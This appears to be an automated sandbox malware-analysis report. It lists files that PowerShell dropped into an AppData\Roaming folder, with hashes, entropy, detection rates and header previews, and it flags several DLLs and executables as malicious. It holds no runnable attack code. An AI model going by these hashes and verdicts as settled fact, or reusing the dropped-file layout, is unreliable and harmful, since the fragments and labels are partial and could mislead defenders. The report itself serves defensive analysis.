                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>TCPIP Group Policy Template file</displayName>.. <description>This admx file describes policy template for TCPIP components</description>.. <resources>.. <stringTable>.. <string id="TCPIP">TCPIP Settings</string>.. <string id="Ipv6Transition">IPv6 Transition Technologies</string>.... <string id="ISATAP_State">Set ISATAP State</string>.. <string id="ISATAP_Router_Name">Set ISATAP Router Name</string>.. <string id="6to4_State">Set 6to4 State</string>.. <string id="6to4_Router_Name">Set 6to4 Relay Name</string>.. <string id="6to4_Router_Name_Resolution_Interval">Set 6to4 Relay Name Resolution Interval</string>.. <s

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\wlansvc.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1977
                                                                                                                                                                                                        Entropy (8bit):4.903195660648944
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cwD5x8gmipnasavWANaqwDtCsiFsaMQnV:lD5pmipasavWuaqwhsFsaM0V
                                                                                                                                                                                                        MD5:13E20C78E89E7FC58934BCFF584E12A1
                                                                                                                                                                                                        SHA1:52DCC829C427CE609034C9106460C7734BEBD3ED
                                                                                                                                                                                                        SHA-256:A59E2ED355AC803474C9EF02A60076BB98ADBB33AD6AA6884AB1B4850BAC4C02
                                                                                                                                                                                                        SHA-512:14C6DB1DCB97692D561C961A5A1A5F0F25BC6CC3CB28DC878CD46296339E16C36BA8A364BE4F80A42D2C27725BECDED3020DC68BE820F0343FE92A961F018966
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2010 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>WLAN Service Group Policy Settings</displayName>.. <description>WLAN Service Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WlanSvc_Category">WLAN Service</string>.. <string id="NetworkCost_Category">WLAN Media Cost</string>.. <string id="SetCost">Set Cost</string>.. <string id="SetCost_Help">This policy setting configures the cost of Wireless LAN (WLAN) connections on the local machine.....If this policy setting is enabled, a drop-down list box presenting possible cost values will be active. Selecting one of the following values from the list will set the cost of all WLAN connections on the local m

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\wwansvc.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2971
                                                                                                                                                                                                        Entropy (8bit):4.817228267034193
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cwD5x8gmL0PfvW8N0qwDtCsiFcs2mANRqwDtCsiFnMlpV:lD5pmL0PfvWq0qwhsFcs2muRqwhsFnM1
                                                                                                                                                                                                        MD5:761AF87D50F53F0CE9947B5D486C30FA
                                                                                                                                                                                                        SHA1:DC926F9449848CCE778326607BD4787ED6C80A01
                                                                                                                                                                                                        SHA-256:8F1F6C7509F5C7C27B8F6E5DCF81FB8C02AE3FFEE825F6CFA4171A712BE018D4
                                                                                                                                                                                                        SHA-512:ECCF653D5935C3777F14F08C0F5318B927E230C08AAA09DEBFD09ACA23A27B0887FE94A8670B635FD7D7B6ACCF3D3DFED2BFBCD02298A5B58089D66219A7E366
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2010 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>WWAN Service Group Policy Settings</displayName>.. <description>WWAN Service Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WwanSvc_Category">WWAN Service</string>.. <string id="NetworkCost_Category">WWAN Media Cost</string>.. <string id="SetCost3G">Set 3G Cost</string>.. <string id="SetCost3G_Help">This policy setting configures the cost of 3G connections on the local machine.....If this policy setting is enabled, a drop-down list box presenting possible cost values will be active. Selecting one of the following values from the list will set the cost of all 3G connections on the local machine:....

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\ffmpeg.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2704792
                                                                                                                                                                                                        Entropy (8bit):6.725743776039723
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:ImBYJtMTl/GuTvOCnCaYXWRTDF8fLen6yfZ0rO43PSGgt2:9OC9YXeTDFWD5PZ
                                                                                                                                                                                                        MD5:449BF7A46490FA07881D969B6D52C0F1
                                                                                                                                                                                                        SHA1:E520A8318E867C7840E6DEADEF36ABCDF2894417
                                                                                                                                                                                                        SHA-256:5883D041C5F5020AC4B66314D5F89CB6331DB3C4EC1C912F72B3EBB9AA8C41E2
                                                                                                                                                                                                        SHA-512:EABAA33B037BA9F1EE874C534D85AD281985E85E1DD2C115A2693F56381A9A596F22B16938916FD34804A3D490CD0AC53A2969C5F73A923B163C5474FEA91B91
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....{.f.........." .....~ .........`........................................0s.......)...`A.........................................I'......O'.(.............q.......)..)....r..3..."'......................!'.(.... .@............R'.8............................text...u| ......~ ................. ..`.rdata...d.... ..f.... .............@..@.data.....I...(.."....'.............@....pdata........q.......(.............@..@.gxfg....,....r.......(.............@..@.retplne......r.......(..................tls..........r.......(.............@..._RDATA........r.......(.............@..@.reloc...3....r..4....(.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\icudtl.dat

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10717680
                                                                                                                                                                                                        Entropy (8bit):6.282426578921538
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:196608:WgPBhORiuQwCliXUxbblHa93Whli6Z26wO+:W8wkDliXUxbblHa93Whli6ZUF
                                                                                                                                                                                                        MD5:74BDED81CE10A426DF54DA39CFA132FF
                                                                                                                                                                                                        SHA1:EB26BCC7D24BE42BD8CFBDED53BD62D605989BBF
                                                                                                                                                                                                        SHA-256:7BF96C193BEFBF23514401F8F6568076450ADE52DD1595B85E4DFCF3DE5F6FB9
                                                                                                                                                                                                        SHA-512:BD7B7B52D31803B2D4B1FD8CB76481931ED8ABB98D779B893D3965231177BDD33386461E1A820B384712013904DA094E3CD15EE24A679DDC766132677A8BE54A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E.......E..P/...E.../...E..P7...E...7...E...h...F...h.. F..Pi..0F......DF.....WF.....jF..P...}F.......F..`....F.......F.. ....F.......F..0....F.......G......G......(G.....;G..@...NG......aG.....tG.......G.......G..@....G.......G.......G.......G..P....G.......H.......H..P...2H......EH..`...UH......hH......yH..P....H.......H.......H..`....H.......H.......H..P....I.......I......-I..@...=I......PI......aI..@...uI.......I...0...I.. 1...I..p1...I...e...I...e...I...i...I..`i...J...i..)J...K..BJ..p...^J..."'.uJ..P.'..J....'..J...5'..J..06'..J...>'..J..P?'..K...D'..K...F'.0K...H'.IK...V'.hK....(..K....(..K..P.)..K....)..K..pW*..K..P.*..L...*+.?L..p.+.bL....+..L...U,..L....,..L....,..L....,..L..@.,..M....,.-M..P.-.IM.. e-.`M...e-.~M...R/..M.../..M..0.0..M..@.0..M..P.0..M....0..N....0.!N...,0.9N...,0.NN..0-0.fN...-0.vN...Y0..N...Z0..N..

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\v8_context_snapshot.bin

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):613840
                                                                                                                                                                                                        Entropy (8bit):5.353969995543054
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:ti2Cr/XgXBS/YKiMpN5zzivVsTRlWxYZbAIf+jL/k5nnPo7p1KFqUg/J6:tZCr/BzOvrYs1KgJ6
                                                                                                                                                                                                        MD5:753BE41D649D31812067EC2B85C10F0E
                                                                                                                                                                                                        SHA1:769531CC83B6D5DD9ABFECFA4C2D0C4128BF42F2
                                                                                                                                                                                                        SHA-256:169FC7F80834ACF1D59B62C2ADBE6D1AD477CF2564EE84150DFFFD36CAA1CA33
                                                                                                                                                                                                        SHA-512:86D76228FD82B09529D15D35B9BD45F7E0EA7328EA984FF9E0414A05746B7853DDB2AC8537A1D46B59F4A13F471120C3A428DF28FB51FC9FACC51C5F9EF6D497
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........O.'a.c>.7.5.288.23......................................................X...,>......p4......................P....B...B..P.......`....`....`....`....`t...`x...`V...`....`...... ....y.`H...D..X!}...X!A...X!A.D. ..Q.`H...D..X!m...X!E...X!E.D. ..`H...D..X!}...X!I...X!I.D. ....`H...D..X!}...X!M...X!M.D. ..i.`....D..X!q...X!Q...X!Q.D. ....`H...D..X!}...X!U...X!U.D. ..9.`H...D..X!}...X!Y...X!Y.D. ..`H...D..X!}...X!]...X!].D. ..`H...D..X!}...X!a...X!a.D. ....`H...D..X!u...X!e...X!e.D. ..`H...D..X!}...X!i...X!i.D.(Jb....!..... ..F`....^.Q...V`.....(Jb....1..... ..F`....^......@...IDa........D`....D`....D`.....`.....D]....D`.@.....V`......WIa...........V`......WIa...........WIa...........WIa...........WIa...........V`......WIa...........WIa...........WIa...........V`......WIa...........WIa...........WIa...........WIa............L`.....HD...D...D..Qb........3......D...L.........................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\NAudio.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):519944
                                                                                                                                                                                                        Entropy (8bit):6.065481336711818
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:rnXnae2TPlr3zvzar5oRDaw92wP6mai9gs6CU:78lrT+r5ADakP4i9gsc
                                                                                                                                                                                                        MD5:65839A5C28A0DEE380C4EBA54E2D941F
                                                                                                                                                                                                        SHA1:AC609EA7F86FE533820B801CFE40B22F8A7A3F1B
                                                                                                                                                                                                        SHA-256:C7A4C035D89716B027F69C2CC98EAF5C44FB15B08C2EA162D793466356A35A2A
                                                                                                                                                                                                        SHA-512:E6853FF5D10D11B5333F0697DCB660A042EBEAE12EEBC84427D0B9F896CF100258E7E6D18F531AAE700C0F476F91F11DA0272E7809728DF68DA80EE560136AEB
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s$............" ..0.................. ........... ....................... ...........@.................................@...O........................'..........h...T............................................ ............... ..H............text...h.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................t.......H.......,g..\P............................................................{<...*..{=...*V.(>.....}<.....}=...*...0..;........u(.....,/(?....{<....{<...o@...,.(A....{=....{=...oB...*.*. ... )UU.Z(?....{<...oC...X )UU.Z(A....{=...oD...X*.0...........r...p......%..{<..........+.....+...-.q+........+...-.&.+...+...oE....%..{=..........,.....,...-.q,........,...-.&.+...,...oE....(F...*r...(....(G.....}......}....*JrG..p.......(H...*2.,...s....z*..{....*N.,...i./...s......*N.,...i

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\RcClientBase.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):30512
                                                                                                                                                                                                        Entropy (8bit):6.293166408242498
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:37VPSe+T3KkTRIjjzi3WbR1zQnSyGUvXU7Ex3dVOSRZYNyb8E9VF6IYinAM+oaua:37VPSFTamMRbzCfzZQEpYinAMxJH4
                                                                                                                                                                                                        MD5:F0739E1DB958FDE4DC6BAB9D75865191
                                                                                                                                                                                                        SHA1:FEDADBF79B594995E6C44108D6B25CDBBF05EB65
                                                                                                                                                                                                        SHA-256:27FAAC58C4EDC8FB147C9947FC9567AFD2F785B11252C2963788FD0F64F7CA42
                                                                                                                                                                                                        SHA-512:ADBF2A0B42C6043EE5C984C02FCC8815B143117FA2EE0286B048F9E90D695F74F0129240E1DE36DEA2915F1E3D31359953095E6E5497337D01F0004D443AAD10
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!..0..F...........e... ........... ...............................3....`.................................He..O....................P..0'...........d............................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............N..............@..B................|e......H........3...1...........................................................0..H..........(*...(.......,.*........s..... .... .:..s....}............s....(%...*V.#......>@(....o3...*...0..=........(+...r...po......o2....(+...r3..po......&.(+...rw..po......*...........)).......*...0..@........(6....{....%-.&+. .... .:..(....&..}........(+...r...p.o......*........++.......0..7........{....,..{....o......}.....(8.......(+...r...p.o......*.........""......v.{......o....&.{....,..o...

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ct

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3136432
                                                                                                                                                                                                        Entropy (8bit):5.953248030549441
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:KQ96YdG5LJ3Z3k0jbdHMsChIiv1o/spNM:FqBkMGsCJe
                                                                                                                                                                                                        MD5:CF83372CE8462708F58817B1560E7006
                                                                                                                                                                                                        SHA1:6484FDC351661E0EC40FF6D8EF2D9C1DF2B05F1A
                                                                                                                                                                                                        SHA-256:37A5A53B7D95439B05B5E4F394DE8B931A500F6DF97AAF1A82CB8A66C11478F2
                                                                                                                                                                                                        SHA-512:D4D24CFE4819343A98D2C83F62B456E922FF88215015D6A76D230D4034B68AFBEF45E3FAD2B92B6D2DBFC2772B65C0BB91545B61BD0231C8A75C03A4146352D6
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........h.......z.........@..............................0.......0...`.........................................>9#......9#.d.....)..l...@(.....HF/.h....P0..&....#.8.....................#.(...@...8............A#......*#......................text............................... ..`.rdata.../.......0..................@..@.data....<....$.......#.............@....pdata.......@(......~'.............@..@.gxfg....3... )..4...X(.............@..@.retplne.....`).......(..................tls....1....p).......(.............@....voltbl.D.....).......(.................CPADinfo8.....).......(.............@...LZMADEC.......).......(............. ..`_RDATA........).......(.............@..@malloc_h......).......(............. ..`.rsrc....l....)..n....(.............@..@.reloc...&...P0..(..../.............@..B........................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):29152
                                                                                                                                                                                                        Entropy (8bit):6.656857622778623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:+yq82Ud7/zfkn8I+ilpd4TILqIgXYoBCH/3hprl:Zq824LfMV4TqqIgXYoBCH/3hpB
                                                                                                                                                                                                        MD5:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                                        SHA1:5B94D0ADAC4DF2D7179C378750C4E3417231125F
                                                                                                                                                                                                        SHA-256:A73454C7FAD23A80A3F6540AFDB64FC334980A11402569F1986AA39995AE496D
                                                                                                                                                                                                        SHA-512:5C0A5E9A623A942AFF9D58D6E7A23B7D2BBA6A4155824AA8BB94DBD069A8C15C00DF48F12224622EFCD5042B6847C8FB476C43390E9E576C42EFC22E3C02A122
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=...=...=....`.?...#.e.?...#.c.<...#.r.?.......8...=...f...#.u.$...#.b.<...#.g.<...Rich=...................PE..L......I................."...(......a,.......@....@..................................u......................................lB..P....p..@............N...#...........................................A..@............@..x............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......0..............@....rsrc...@....p.......<..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateClient.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):65856
                                                                                                                                                                                                        Entropy (8bit):6.253138341040912
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:DyvHa8En7WFlzobIrmKD8owRaggg5TIcO3YDmj7Hx4:DyvHa8EnKFqKD8aK0jj6
                                                                                                                                                                                                        MD5:760F24F0150A6E8DC15AC793C3172387
                                                                                                                                                                                                        SHA1:920D5AAFB4B460EFC37B99564BD281E63C7EB647
                                                                                                                                                                                                        SHA-256:E113F8593244C1BB5BCC73FEF0F93303C783714162CBD9EF93DDFF5709C037CE
                                                                                                                                                                                                        SHA-512:E5251075164F9CDB154B0B5BF7B775C9720B0744D004B68CE6501A980342F45398505BC26F7CCA982BD23A03609B3C78510A5778A93041E7614E17B369A7209F
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. .......................@.......p....@.................................t...J.......................@'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......l....`..............`...........................................V. 0u..}........(....*.."..(....*...6..(....(....*...0..;.......s......s.......(.......,..o......o........,..o.......(....*.....................#).......0..;.......s......s.......(.......,..o......o........,..o.......(....*.....................#).......0..;.......s......s.......o.......,..o......o........,..o.......(....*.....................#).......0..B.......s......s.......o......o.......,..o......o...

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateCommon.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):146752
                                                                                                                                                                                                        Entropy (8bit):6.209702529084155
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:8zWwFkpFMOKq9hC3ZWU+Oq1hZ+fVztxQ0rzc0to734o:s/zq9huqrZ+dbQIz1o
                                                                                                                                                                                                        MD5:985F25C1D3144F37F046BC8F3E2B0C83
                                                                                                                                                                                                        SHA1:C0B551C51317891D8220AB5A634C15ACF8223E88
                                                                                                                                                                                                        SHA-256:3F71FA4C64376E85486B22DE926F61C3E3CDE3DE6C1D484E041F265534CCD623
                                                                                                                                                                                                        SHA-512:B0DB2C878948922243CC80AB015A954B11C5E08FCE7DBE767722BC5082B150F277690ACF9DA1C657837E7A66059CAFA7BA76C3695BBA51B44467979F5A9C053B
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................-... ...@....@.. ..............................g"....@..................................-..J....@..................@'...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........................................................................0..E........(......(......(......~....%-.&~..........s....%.....(...+(...+(....*...z..~.....?(....(....o....(....*..0...........(......~.....l(....(....o....(....(......~.....}(....(....o....(....(.....(....( ...,..~.... ....(....(.....~.... ....(....(....o!.....s"...(.....,5.o#....+..o$.....(.....s....o%....o&...-....,..o'....*.........$.........{....*"..}....*.....{....*"..}....*.....(....~....%-.&~...

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\config.prx

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):373656
                                                                                                                                                                                                        Entropy (8bit):5.747099794440249
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:rbT9vTZFNSlIbVf7o3Cyi7igb/Js0S6uZZspiDbZHNjWOnNxFiKey1ISQlXflY:fRvNvvbhOq7F3S/qpiDlNCONvmXdY
                                                                                                                                                                                                        MD5:14934CACA84D5FE0288F27EFB31DCBF8
                                                                                                                                                                                                        SHA1:98C8C659488A5782679112E0FFB089422A664AC5
                                                                                                                                                                                                        SHA-256:7FA86147035627BAE39576BCBE619D045E94A48C4DB8CA131968C20BB4DE4A36
                                                                                                                                                                                                        SHA-512:9A239132A46FE578FA04FF727D8C28F9E1D179E7154619670A22A403819F337AF0A96EBD7081D04D53910A12BBDC548B3CD2B2A285931C92F1C149AD5D846A6A
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................".....".......Q....R....D....C....T.......r...M....S....V....Rich............................PE..L.....b`.....................t....................@..................................X....@.................................${..|...................`...S...P...)...................................=..@...............P............................text...$........................... ..`.rdata.............................@..@.data...............................@....rsrc..............................@..@.reloc..nD...P...F..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):653952
                                                                                                                                                                                                        Entropy (8bit):6.885961951552677
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
                                                                                                                                                                                                        MD5:11D49148A302DE4104DED6A92B78B0ED
                                                                                                                                                                                                        SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
                                                                                                                                                                                                        SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
                                                                                                                                                                                                        SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14191200
                                                                                                                                                                                                        Entropy (8bit):7.9262695020755505
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:393216:W1pU8xeUOhMFCBURDP4RSLkcswLqLibwonZ14tb:Wr7rCBURqcTXconZ1Ab
                                                                                                                                                                                                        MD5:77B8F54C99903633175BF2EE83B93089
                                                                                                                                                                                                        SHA1:F8A7C2D280464EA887F95295670D1A3C78146519
                                                                                                                                                                                                        SHA-256:09F7868EB0D7629399F54934AE930314358845C9929D973B05F6C1CCA7C67A9E
                                                                                                                                                                                                        SHA-512:54D618060571517317F5A6020D79A0E693D499AC865C2A031B5F7AFCCE0EBF75F3610C42F807FEA0FC0B7852F0B119EABE80E317EC7CB181B90B90C202A09BBB
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..^...........!.................E5.......................................w......a9...@..........................B..|....K.x....pw..............j..` ....w.....................................`aw.@...............,............................text...z........................... ..`.rdata...D..........................@..@.data...pC....!.....................@..._COF0.....v..@(..................... ..`_COF1...D...........................@..._COF2....R.......T.................. ..`.rsrc........pw......Z..............@..@.reloc........w......b..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\vstji

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9926
                                                                                                                                                                                                        Entropy (8bit):6.601683018009094
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:bcCThv4kMUxkMSwJZ8JewGJ6PlKeVsXmWl97ZHaaRbdn2OYvFDE84BRP:vThvYMSwJZ+GJ6PMtWWX16ab29Kb
                                                                                                                                                                                                        MD5:0780B1687F4B818A6CCA3CAF57B0D062
                                                                                                                                                                                                        SHA1:49B0E39A452F956F640F185CF396D31E8E8E8A39
                                                                                                                                                                                                        SHA-256:9E7AEA9FBA017E367B8FD3B188F6AFEF0197F89036FA35420729F19048C6FF2D
                                                                                                                                                                                                        SHA-512:8B002C586B73D4AF5A5DAAE512C2B096C4A061BC69AD3750C930D6429FA75C947BD7305A25A9378BEE236C1028914E91B9111A7D735B9D029E2FE7063562CB00
                                                                                                                                                                                                        Malicious:false
